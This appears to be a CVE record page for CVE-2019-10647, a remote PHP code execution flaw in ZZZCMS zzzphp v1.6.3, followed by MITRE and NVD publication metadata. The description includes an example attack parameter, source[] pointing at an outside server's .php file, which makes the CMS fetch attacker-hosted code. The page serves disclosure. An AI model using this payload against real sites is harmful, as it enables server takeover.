ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
History

No history.

cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published: 2019-03-30T12:30:59

Updated: 2024-08-04T22:32:00.646Z

Reserved: 2019-03-30T00:00:00

Link: CVE-2019-10647

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Analyzed

Published: 2019-03-30T13:29:00.467

Modified: 2019-04-01T15:01:03.527

Link: CVE-2019-10647

cve-icon Redhat

No data.